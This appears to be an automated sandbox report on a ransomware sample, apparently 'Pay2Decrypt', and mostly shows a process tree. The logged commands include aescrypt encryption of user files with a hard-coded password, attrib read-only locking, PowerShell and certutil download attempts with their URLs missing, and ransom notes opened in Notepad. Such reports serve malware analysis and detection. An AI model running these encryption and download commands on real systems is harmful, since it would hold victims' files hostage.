C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\InstallLock.xps.lck1⤵
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt3.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\p2d.bat" "1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap10835:64:7zEvent30677 -ad -saa -- "C:\Users\Admin\Desktop\p2d"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
2.5MB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
8KB